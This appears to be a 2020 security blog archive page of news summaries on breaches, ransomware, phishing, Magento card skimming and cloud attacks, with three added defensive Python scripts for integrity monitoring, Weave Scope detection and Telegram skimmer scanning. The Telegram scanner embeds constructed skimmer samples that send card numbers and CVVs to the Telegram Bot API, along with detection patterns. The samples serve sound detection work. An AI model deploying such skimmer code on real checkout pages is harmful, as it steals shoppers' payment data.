Sep 28 2020

Thin clients from a security perspective

Category: Security playbook, Virtualization | DISC @ 1:58 pm

The mass transition to working from home has made clear which technologies best provide a secure and convenient remote working environment.

Users get the greatest security benefit by connecting to virtual desktops from thin clients.

A thin client is a terminal-mode device. It often has no internal storage at all: it is just a box that connects to a server and lets the user attach a monitor and peripherals (the exact configuration varies by model). The thin client itself neither processes nor stores any work data.

A thin client does, of course, require a reliable communications channel. In recent years that has not been much of a hurdle.

Communication between a thin client and the server is normally carried over an encrypted protocol, which addresses the risk of an untrusted network sitting between the two.

Source: Thin clients from a security perspective

2020 Security Playbook

1) Data discovery
2) Compartmented Data Access
3) Move to thin client
4) Increase focus on AAA




DISC InfoSec 🔒 securing the business 🔒 via latest InfoSec titles

Subscribe to DISC InfoSec blog by Email

👉 Download a Virtual CISO (#vCISO) and Security Advisory Fact Sheet & Cybersecurity Cheat Sheet

Download a Security Risk Assessment Steps paper!

Tags: Security playbook, Thin Client, Thin Client PC


Sep 27 2020

Enhance your privacy management with ISO 27701

Category: ISO 27k | DISC @ 11:09 am

ISO/IEC 27701:2019 provides guidance on data protection, including how organizations should manage personal information, and helps demonstrate compliance with privacy regulations around the world, such as the GDPR.

The Standard integrates with the international information security management standard ISO/IEC 27001 to extend an ISMS (information security management system), enabling an organization to establish, implement, maintain and continually improve a PIMS (privacy information management system).

The ITG pocket guide ISO/IEC 27701:2019: An introduction to privacy information management is an ideal primer for anyone implementing a PIMS based on ISO 27701.

Improve your privacy information management regime

Co-written by Alan Shipman, an acknowledged expert in the field of privacy and personal information and the project editor of ISO/IEC 27701, this pocket guide will help you understand the basics of privacy management, including:

  • What privacy information management means
  • How to manage privacy information successfully using a PIMS aligned to ISO/IEC 27701
  • Key areas of investment for a business-focused PIMS
  • How your organization can demonstrate the degree of assurance it offers with regard to privacy information management

ISO/IEC 27701:2019: An introduction to privacy information management

ISO 27701 Gap Analysis Tool



Tags: ISO 27701, ISO 27701 Gap Analysis Tool, PIMS


Sep 25 2020

Data for 600K customers of U.S. fitness chains Town Sports leaked online

Category: Data Breach | DISC @ 11:16 am

A database containing personal information on over 600,000 clients of the US fitness chain Town Sports was exposed on the Internet.

The archive held records for almost 600,000 members and staff; the exposed information includes names, addresses, phone numbers, email addresses, the last four digits of payment cards, card expiration dates, and members' billing history.

"Fitness chain Town Sports International has exposed 600,000 records of members and employees on the web without a password or any other authentication required to access it, Comparitech researchers report," reads the report published by Comparitech. "Comparitech security researcher Bob Diachenko received a tip from cybersecurity expert Sami Toivonen about the exposure on September 21, 2020."

Source: Data for 600K customers of U.S. fitness chains Town Sports leaked online


Sep 24 2020

SMS phishing scam pretends to be Apple "chatbot" – don't fall for it!

Category: Phishing | DISC @ 11:01 pm

If you got someone else's "free offer" in what looked like a misdirected message, would you take a peek?

Dear Christopher, we have your packet in queue. Address: Londonderry, 
Ballynagard crescent http COLON SLASH SLASH xxxxxxxx DOT com SLASH zzzzzzz

The message is meant to look as though it was sent to the wrong number, so the crooks rely on you being intrigued enough to click through, whereupon they use some sneaky "reverse authentication" psychology to lure you in further.

Source: SMS phishing scam pretends to be Apple "chatbot" – don't fall for it!


Sep 24 2020

Hacker Accessed Network of U.S. Agency and Downloaded Data

Category: Hacking | DISC @ 10:24 pm

An unnamed U.S. federal agency was hit with a cyber-attack after a hacker used valid access credentials, authorities said on Thursday.

While many details of the hack weren’t revealed, federal authorities did divulge that the hacker was able to browse directories, copy at least one file and exfiltrate data, according to the Cybersecurity & Infrastructure Security Agency, known as CISA.

The hacker implanted malware that evaded the agency’s protection system and was able to gain access to the network by using valid access credentials for multiple users’ Microsoft 365 accounts and domain administrator accounts, according to authorities.

Source: Hacker Accessed Network of U.S. Agency and Downloaded Data


Security Risk assessment Quiz – Find Out How Your security risk assessment Stands Up!



Sep 23 2020

Govt. Services Firm Tyler Technologies Hit in Apparent Ransomware Attack

Category: Ransomware | DISC @ 11:23 pm

Tyler Technologies, a Texas-based company that bills itself as the largest provider of software and technology services to the United States public sector, is battling a network intrusion that has disrupted its operations. The company declined to discuss the exact cause of the disruption, but their response so far is straight out of the playbook…

Earlier today, the normal content on tylertech.com was replaced with a notice saying the site was offline. In a statement provided to KrebsOnSecurity after the markets closed central time, Tyler Tech said early this morning the company became aware that an unauthorized intruder had gained access to its phone and information technology systems.

"Upon discovery and out of an abundance of caution, we shut down points of access to external systems and immediately began investigating and remediating the problem," Tyler's Chief Information Officer Matt Bieri said. "We have since engaged outside IT security and forensics experts to conduct a detailed review and help us securely restore affected equipment. We are implementing enhanced monitoring systems, and we have notified law enforcement."

"At this time and based on the evidence available to us to-date, all indications are that the impact of this incident is limited to our internal network and phone systems," their statement continues. "We currently have no reason to believe that any client data, client servers, or hosted systems were affected."

Source: Govt. Services Firm Tyler Technologies Hit in Apparent Ransomware Attack


Sep 22 2020

Operation DisrupTor: police arrested 179 vendors engaged in the sale of illicit goods

Category: Cybercrime | DISC @ 1:54 pm

A global police sting dubbed Operation DisrupTor targeted vendors and buyers of illicit goods on the dark web, Europol announced.

Source: Operation DisrupTor: police arrested 179 vendors engaged in the sale of illicit goods – Security Affairs



Sep 21 2020

Guard your data with these privacy-focused search engines & browsers

Category: Information Privacy, Web Security | DISC @ 12:11 pm

Tracking lets companies improve their algorithms and app experience, but that experience comes at the cost of your data. In this guide we focus on the search engines and browsers you will want to use if you care about your online privacy.

Popular search engines and browsers do a great job of finding and browsing content on the web, but could do a better job of protecting your privacy while you do so.

With your data being the digital currency of our times, websites, advertisers, browsers and search engines track your behavior on the web to deliver tailored advertising, improve their algorithms, or improve their services.

Privacy-focused search engines

Below are the best privacy-focused search engines that do not track your searches or display advertisements based on your cookies or interests.

Source: Guard your data with these privacy-focused search engines & browsers




Sep 17 2020

iOS 14 default app settings automatically reset to Mail and Safari after reboot – 9to5Mac

One of the new features in iOS 14 is the ability to change the default email or browser app to a third-party alternative such as Chrome, Edge, or Outlook. A bug in the first public release of iOS 14, however, causes your default browser or mail app setting to reset to Mail or Safari when […]

Source: iOS 14 default app settings automatically reset to Mail and Safari after reboot – 9to5Mac

In the version of iOS 14 released to the public this week, there is a massive caveat to the new default browser and settings. If you reboot your iPhone or iPad, the default app setting will reset to Apple’s first-party Mail and Safari applications.

What this means is that if you set Chrome as the default browser, but then your iPhone dies or you need to reboot it, Safari will once again become the default browser app until you go back into the Settings app and make the change again. The same applies to email apps such as Microsoft Outlook and Spark as well.

This is almost certainly some sort of bug on Apple’s side, because it is affecting email and browser apps from multiple companies including Google, Microsoft, and Readdle. On Twitter, a Google Chrome engineer has acknowledged the problem, though the ball is likely in Apple’s court to roll out some sort of fix — unless this is bizarrely the intended behavior.


Sep 16 2020

Privacy-focused search engine DuckDuckGo is growing fast

Category: Information Privacy | DISC @ 10:47 pm

DuckDuckGo, the privacy-focused search engine, announced that August 2020 ended in over 2 billion total searches via its search platform.

Source: Privacy-focused search engine DuckDuckGo is growing fast

Tags: DuckDuckGo, privacy concerns


Sep 15 2020

Russian hacker selling how-to vid on exploiting unsupported Magento installations to skim credit card details for $5,000

Category: Hacking | DISC @ 1:19 pm

Nearly 2,000 e-commerce shops pwned over weekend so it’s time to migrate

Source: Russian hacker selling how-to vid on exploiting unsupported Magento installations to skim credit card details for $5,000

Thousands of e-commerce stores built on Magento 1 have been poisoned with malicious code that steals customers' bank card details as they enter them to order online.

Sansec, a software company focused on these so-called "digital skimming" attacks, discovered that 1,904 online shops had been altered by miscreants over the weekend to include malicious JavaScript that siphoned off shoppers' card data.

"This automated campaign is by far the largest one that Sansec has identified since it started monitoring in 2015," it said in a statement on Monday. "The previous record was 962 hacked stores in a single day in July last year."

The security firm estimated that attackers have stolen personal data from "tens of thousands of customers" so far. The intrusions can be traced back to a Magento 1 zero-day exploit being sold by a Russian-speaking hacker going by the name "z3r0day" on a shady online forum.

For $5,000, z3r0day will show you a video on how to exploit a security hole in the web software to inject the digital-skimming code into an e-commerce site's files, so that the code runs when a customer reaches a payment page on the hijacked site. No authentication is required. The hacker promised not to sell the exploit to more than 10 people, to keep it under wraps and valuable.

Unfortunately, the vulnerability isn't easy to patch because Adobe-owned Magento has ended support for the software (support for Magento 1 ended on 30 June 2020). The best way to avoid such attacks is to migrate to Magento 2, a spokesperson from Sansec told El Reg. "Ideally they should upgrade to Magento 2, but we understand that merchants may need more time. Meanwhile, we recommend having server-side malware monitoring set up and to contract an alternative vendor for critical security patches."

Techies at Sansec have studied two servers with IP addresses in the US and France that were targeted by crooks armed with z3r0day's exploit. The payment details appear to have been funnelled through to a website hosted in Moscow. "We are not at liberty to disclose affected merchants. However, we have shared all relevant data with law enforcement today," the Sansec spokesperson told us.
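The "server-side malware monitoring" Sansec recommends above comes down to knowing which files on the web server changed and when. The following is an added example written for this page, not Sansec's or Magento's code: it takes a SHA-256 baseline of the script and template files a skimmer injection would have to touch, then reports anything added, removed or modified. The document root in `demo()` is constructed in a temporary directory and stands in for a Magento 1 install; the file types worth watching (`WATCHED_SUFFIXES`) are an assumption.

```python
"""Server-side integrity monitor for a web store's code and script files.

Added example illustrating the server-side monitoring Sansec recommends; it
is not Sansec's or Magento's code. A baseline of SHA-256 hashes is taken over
the files an attacker must touch to inject a skimmer (JavaScript, PHP
templates); a later run reports anything added, removed or modified. The
document root used in demo() is constructed in a temporary directory.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# Assumption: these are the file types a skimmer injection has to modify.
WATCHED_SUFFIXES = {".js", ".php", ".phtml", ".html"}


def file_sha256(path: Path) -> str:
    """Hash a file in chunks so large bundles do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(docroot: Path) -> dict:
    """Map POSIX-style relative path -> sha256 for every watched file."""
    return {
        p.relative_to(docroot).as_posix(): file_sha256(p)
        for p in sorted(docroot.rglob("*"))
        if p.is_file() and p.suffix in WATCHED_SUFFIXES
    }


def save_baseline(baseline: dict, out: Path) -> None:
    """Persist the baseline. In practice keep it off-box: a compromised
    server can rewrite a baseline that lives next to the files it covers."""
    out.write_text(json.dumps(baseline, indent=1, sort_keys=True))


def diff_against_baseline(docroot: Path, baseline: dict) -> dict:
    """Classify changes since the baseline was taken."""
    current = build_baseline(docroot)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            p for p in current if p in baseline and current[p] != baseline[p]
        ),
    }


def demo() -> dict:
    """Constructed scenario: clean baseline, then a simulated skimmer injection."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js" / "mage").mkdir(parents=True)
        (root / "js" / "mage" / "cookies.js").write_text("// shipped with the store\n")
        (root / "skin").mkdir()
        (root / "skin" / "logo.png").write_bytes(b"\x89PNG")  # images are not watched
        baseline = build_baseline(root)
        save_baseline(baseline, root / "baseline.json")

        # Simulated tampering: a shipped script is appended to and a new script appears.
        with (root / "js" / "mage" / "cookies.js").open("a") as fh:
            fh.write("document.forms[0].addEventListener('submit', collect);\n")
        (root / "js" / "card.js").write_text("function collect(e) { /* stub */ }\n")

        return diff_against_baseline(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run `build_baseline` once from a known-clean deploy and `diff_against_baseline` on a schedule; any hit under the checkout or payment paths deserves a look at the actual diff, and the baseline must be refreshed after every legitimate deploy or the monitor becomes noise.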


Sep 14 2020

CISA: Chinese state hackers are exploiting F5, Citrix, Pulse Secure, and Exchange bugs

Category: Hacking | DISC @ 2:47 pm

CISA says the attacks started a year ago and some have been successful.

Source: CISA: Chinese state hackers are exploiting F5, Citrix, Pulse Secure, and Exchange bugs | ZDNet



Chinese Hackers Working w/ Ministry of State Security Charged w/ Global Computer Intrusion Campaign
https://www.youtube.com/watch?v=b8zhLOnXDdY&ab_channel=TheJusticeDepartment



The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics



Sep 12 2020

Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods

Category: Ransomware | DISC @ 1:35 pm

Better yet – do the basics and your systems won’t get encrypted in the first place

Source: Don’t pay the ransom, mate. Don’t even fix a price, say Australia’s cyber security bods

The infoseccers strongly advised against paying the criminals:

Paying a ransom does not guarantee decryption of data. Open source reporting indicates several instances where an entity paid the ransom but the keys to decrypt the data were not provided. The ACSC has also seen cases where the ransom was paid, the decryption keys were provided, but the adversary came back a few months later and deployed ransomware again. The likelihood that an Australian organization will be retargeted increases with every successful ransom payment.

It is generally much easier and safer to restore data from a backup than to attempt to decrypt ransomware-affected data.

"Many of these [attacks] could have been avoided or substantially mitigated by good cyber security practices," sighed the ACSC in the report (PDF, 18 pages), which covered the months July 2019 to June 2020.



How to recover your system from a Ransomware attack
https://www.youtube.com/watch?v=kJuibb9QaWk&ab_channel=CSO





Sep 10 2020

Colocation data center giant Equinix hit by Netwalker ransomware

Category: Ransomware | DISC @ 2:56 pm

Equinix, one of the world's largest providers of colocation data centers and interconnection services, announced it was hit by Netwalker ransomware.

Source: Colocation data centers giant Equinix data hit by Netwalker Ransomware

Equinix data center giant hit by Netwalker Ransomware, $4.5M ransom

Equinix Ransomware Attack Hits Company’s Internal Systems

Equinix Statement on Security Incident



Tags: Equinix, Equinix data center


Sep 09 2020

Remember the Titans: Yubico jangles new NFC and USB-C touting security key

Category: 2FA | DISC @ 2:55 pm

Apple crowd included – as NFC can now be used for something other than Apple Pay

Security token biz Yubico has a new key out today, its latest-generation two-factor authentication (2FA) device, the YubiKey 5C NFC, which supports PCs and mobile devices over USB-C and also has a built-in NFC radio.

Previous generations of the YubiKey have offered USB-C and NFC, but not in one package. The most recent NFC-capable device came with an old-school rectangular USB-A connector, limiting its usefulness on newer computers that may not have one. The last model offering USB-C lacked NFC, although it did come with a built-in Lightning plug, effectively covering all the bases of the mobile market.

Source: Remember the Titans: Yubico jangles new NFC and USB-C touting security key

YubiKey 5C NFC


Sep 08 2020

Hackers use legit tool to take over Docker, Kubernetes platforms

Category: Security Breach, Security Incident | DISC @ 3:08 pm

In a recent attack, cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure and still have a good grip on it.

Source: Hackers use legit tool to take over Docker, Kubernetes platforms

Misusing a tool of the trade

Analyzing the attack, researchers at Intezer found that TeamTNT installed the open-source Weave Scope tool to gain full control of the victim's cloud infrastructure.

According to them, this may be the first time a legitimate third-party tool has been abused as a backdoor in a cloud environment, which also indicates the evolution of this particular group. Because the tool itself is legitimate, signature-based controls will not flag it; detection has to come from knowing what is deployed in the environment and who deployed it.

Weave Scope integrates with Docker, Kubernetes, the Distributed Cloud Operating System (DC/OS) and AWS Elastic Container Service (ECS). It provides a full map of the processes, containers and hosts on the server, and control over installed applications.

"The attackers install this tool in order to map the cloud environment of their victim and execute system commands without deploying malicious code on the server," Intezer notes in a report today.
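Since the backdoor here is a legitimate tool, the useful control is an inventory check: does anything in the cluster look like Weave Scope, and was it sanctioned? The following is an added example written for this page, not Intezer's tooling or anything from TeamTNT. It parses the JSON that `kubectl get pods -A -o json` prints and flags pods that look like Weave Scope, or that carry the host-level access such an agent needs. The indicators are assumptions based on Weave Scope's documented deployment shape (images named `weaveworks/scope`, probe pods with `hostPID` and a `docker.sock` hostPath mount, a UI on port 4040), as is the allow-list of namespaces where an operator has deliberately installed it; the pod list is constructed, not from a real cluster.

```python
"""Flag Weave Scope (and Scope-like host privileges) in a Kubernetes pod list.

Added example, not Intezer's analysis tooling or anything from TeamTNT. It
parses the output of `kubectl get pods -A -o json` and reports pods that look
like Weave Scope or that carry the host-level access such an agent needs.
Assumptions: Weave Scope's documented deployment shape (weaveworks/scope
images, probe pods with hostPID and a docker.sock hostPath mount, UI on port
4040) and an allow-list of namespaces where it is sanctioned. The pod list
below is constructed.
"""
import json

SCOPE_IMAGE_HINT = "weaveworks/scope"
SCOPE_UI_PORT = 4040
APPROVED_NAMESPACES = {"weave"}  # assumption: where an operator runs it on purpose


def pod_indicators(pod: dict) -> list:
    """Collect Scope-specific and generic host-privilege indicators for one pod."""
    spec = pod.get("spec", {})
    hits = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if SCOPE_IMAGE_HINT in c.get("image", ""):
            hits.append("image:" + c["image"])
        if any(p.get("containerPort") == SCOPE_UI_PORT for p in c.get("ports", [])):
            hits.append("port:%d" % SCOPE_UI_PORT)
        if (c.get("securityContext") or {}).get("privileged"):
            hits.append("privileged:" + c.get("name", "?"))
    if spec.get("hostPID"):
        hits.append("hostPID")
    for v in spec.get("volumes", []):
        path = (v.get("hostPath") or {}).get("path", "")
        if path.endswith("docker.sock") or path == "/":
            hits.append("hostPath:" + path)
    return hits


def audit(pod_list_json: str) -> list:
    """Return one finding per suspicious pod; clean pods produce nothing."""
    findings = []
    for pod in json.loads(pod_list_json)["items"]:
        ns = pod["metadata"]["namespace"]
        hits = pod_indicators(pod)
        if not hits:
            continue
        looks_like_scope = any(h.startswith(("image:", "port:")) for h in hits)
        if looks_like_scope:
            verdict = ("approved-weave-scope" if ns in APPROVED_NAMESPACES
                       else "unexpected-weave-scope")
        else:
            verdict = "review-host-privileges"
        findings.append({"namespace": ns, "pod": pod["metadata"]["name"],
                         "verdict": verdict, "indicators": hits})
    return findings


def _pod(ns, name, image, **spec):
    """Build a minimal pod object for the constructed sample below."""
    container = {"name": name.split("-")[0], "image": image,
                 "ports": spec.pop("ports", [])}
    if spec.pop("privileged", False):
        container["securityContext"] = {"privileged": True}
    body = {"containers": [container]}
    body.update(spec)
    return {"metadata": {"namespace": ns, "name": name}, "spec": body}


# Constructed stand-in for `kubectl get pods -A -o json`.
SAMPLE_POD_LIST = json.dumps({"items": [
    _pod("kube-system", "coredns-5d4b", "registry.example/coredns:1.7.0"),
    _pod("weave", "weave-scope-app-7f9c", "weaveworks/scope:1.13.1",
         ports=[{"containerPort": 4040}]),
    _pod("default", "scope-probe-x2k9", "weaveworks/scope:1.13.1", privileged=True,
         hostPID=True,
         volumes=[{"name": "d", "hostPath": {"path": "/var/run/docker.sock"}}]),
    _pod("default", "ci-runner-1", "registry.example/ci:latest", privileged=True,
         volumes=[{"name": "d", "hostPath": {"path": "/var/run/docker.sock"}}]),
]})


if __name__ == "__main__":
    for f in audit(SAMPLE_POD_LIST):
        print(f["verdict"], f["namespace"] + "/" + f["pod"], f["indicators"])
```

The `review-host-privileges` verdict is deliberately broad: CNI and node agents legitimately run privileged, so that bucket is for triage against a known-good list rather than an alert on its own. The `unexpected-weave-scope` verdict, on the other hand, is exactly the case the Intezer report describes and is worth paging on.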




Sep 02 2020

Hackers use e-skimmer that exfiltrates payment data via Telegram

Category: data security | DISC @ 9:17 pm

Experts observed a new tactic adopted by Magecart groups: they used Telegram to exfiltrate stolen payment details from compromised websites.

Source: Hackers use e-skimmer that exfiltrates payment data via Telegram
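Exfiltration over Telegram leaves a fingerprint in the skimmer itself: the Telegram Bot API is reached at https://api.telegram.org/bot<token>/<method>, and bot tokens have the shape "<numeric id>:<35 characters>", so the script has to carry that host or a token somewhere. The following is an added example written for this page, not code from the report the post summarizes; it scans checkout-page JavaScript for those indicators. It assumes skimmers may base64-encode the strings to dodge a plain grep (so quoted base64 literals are decoded and scanned too) and that a Magento-style checkout names its card fields as in `CARD_FIELDS`. The sample scripts are constructed, not real skimmer code.

```python
"""Scan checkout-page JavaScript for Telegram Bot API exfiltration indicators.

Added example; not code from the report the post summarizes, and the sample
scripts are constructed. The Telegram Bot API lives at
https://api.telegram.org/bot<token>/<method> and tokens look like
"<numeric id>:<35 chars>". Assumption: the strings may be base64-encoded, so
quoted base64 literals are decoded and scanned as a second layer.
"""
import base64
import re

TELEGRAM_HOST = re.compile(r"api\.telegram\.org/bot", re.I)
TELEGRAM_TOKEN = re.compile(r"\d{8,10}:[A-Za-z0-9_-]{35}\b")
BASE64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
# Assumption: field names a Magento-style checkout uses for card data.
CARD_FIELDS = re.compile(r"cc_number|card_number|cc_cid|cvv|exp_year", re.I)


def decoded_base64_literals(js: str):
    """Yield the decoded text of every quoted literal that parses as base64."""
    for m in BASE64_LITERAL.finditer(js):
        try:
            yield base64.b64decode(m.group(1), validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue


def scan_script(js: str) -> dict:
    """Return the indicators found in one script body and a severity."""
    findings = []
    layers = [("plain", js)] + [("base64", t) for t in decoded_base64_literals(js)]
    for layer, text in layers:
        if TELEGRAM_HOST.search(text):
            findings.append("telegram-bot-api-url (%s)" % layer)
        if TELEGRAM_TOKEN.search(text):
            findings.append("telegram-bot-token (%s)" % layer)
    if CARD_FIELDS.search(js):
        findings.append("reads-card-fields")
    telegram = any(f.startswith("telegram") for f in findings)
    cards = "reads-card-fields" in findings
    # Reading card fields alone is normal for checkout code; Telegram alone is
    # odd on a store; the combination is what a skimmer looks like.
    severity = ("high" if telegram and cards else "medium" if telegram
                else "low" if cards else "none")
    return {"findings": findings, "severity": severity}


def scan_all(scripts: dict) -> dict:
    """Scan a mapping of script name -> body."""
    return {name: scan_script(body) for name, body in scripts.items()}


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


FAKE_TOKEN = "123456789:" + "AAH" + "x" * 32  # constructed; not a real token

# Constructed samples: one benign checkout script, one plain skimmer, one that
# hides the Telegram host and token behind atob().
SAMPLES = {
    "checkout-benign.js": (
        "document.getElementById('checkout').addEventListener('submit', "
        "function () { dataLayer.push({event: 'purchase'}); });"
    ),
    "skimmer-plain.js": (
        "var d = document.getElementById('cc_number').value + '|' + "
        "document.getElementById('cc_cid').value;\n"
        "new Image().src = 'https://api.telegram.org/bot" + FAKE_TOKEN
        + "/sendMessage?chat_id=1&text=' + encodeURIComponent(d);"
    ),
    "skimmer-obfuscated.js": (
        "var h = atob('" + _b64("https://api.telegram.org/bot") + "');\n"
        "var t = atob('" + _b64(FAKE_TOKEN) + "');\n"
        "var f = ['cc_number', 'cc_exp_year', 'cc_cid'].map("
        "function (i) { return document.getElementById(i).value; });\n"
        "fetch(h + t + '/sendMessage?chat_id=1&text=' + encodeURIComponent(f.join('|')));"
    ),
}


if __name__ == "__main__":
    for name, result in scan_all(SAMPLES).items():
        print(name, result["severity"], result["findings"])
```

The check is a coarse string scan, so treat it as one signal among several: skimmers that build the host from character codes or fetch it from a second-stage script will not be caught, which is why it belongs alongside file-integrity monitoring and an egress allow-list for the checkout page, not instead of them.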



CISA Webinar: E-Skimming
https://www.youtube.com/watch?v=ngJwm8ydYNI

This Is How Easy It Is To Get Hacked | VICE on HBO
https://www.youtube.com/watch?v=G2_5rPbUDNA




Tags: e-skimmer, exfiltrates data, Telegram


Sep 01 2020

Is China the World’s Greatest Cyber Power?

Category: cyber security, Cyber War | DISC @ 11:32 pm

While the US, Russia, Israel, and several European nations all have sophisticated cyber capabilities, one threat intelligence firm argues that China’s aggressive approach to cyber operations has made it perhaps the world’s greatest cyber power.

Source: Is China the World’s Greatest Cyber Power?


“The goal is simple: break down trust in democracies, disrupt election cycles or manipulate democratic election results, and gain economic advantage over adversaries to advance global position and power,” according to the report.

“Over the past decade, China has become increasingly forthright in its intentions, and this change has been observed in cyber operations as well,” the report states. “Researchers have observed stark differences in tactics, tone, and behavior from Chinese state-sponsored cyber, military, and political parties over the past several years.”

“When it comes to China, cyber is not a tactical weapon, it is a strategic means to an end,” Maor says. “And if you are wondering what that end is, it is not something secret — it is something that is published every five years.”

There’s A Crisis That Is Quietly Creating New Economic Superpowers…
https://www.youtube.com/watch?v=h6GqEpmn_Fk

Tags: Cyber capabilities, cyber military, cyber operations, Cyber Power, Cyber Super Power, Greatest Cyber Power


Aug 31 2020

Hackers are backdooring QNAP NAS devices with 3-year old RCE bug

Category: Hacking, Malware | DISC @ 3:58 pm

Hackers are scanning for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions, trying to exploit a remote code execution (RCE) vulnerability addressed by QNAP in a previous release.

Source: Hackers are backdooring QNAP NAS devices with 3-year old RCE bug


CISA says 62,000 QNAP NAS devices have been infected with the QSnatch malware

QSnatch malware, first spotted in late 2019, has grown from 7,000 bots to more than 62,000, according to a joint US CISA and UK NCSC security alert.


QSnatch And How To Protect Your QNAP NAS From Online Intruders

QNAP urges users to update Malware Remover after QSnatch alert

Tags: Backdoor, backdooring


Aug 29 2020

The Best DEF CON Talks Of All Time!

Category: Hacking | DISC @ 11:22 am

As the title of this post suggests we’ve sourced what we believe to be the best DEF CON presentations from 1993 to the present day. For those that don’t know, DEF CON is literally the ‘poster-child’

Source: The Best DEF CON Talks Of All Time!

Tags: DEF CON

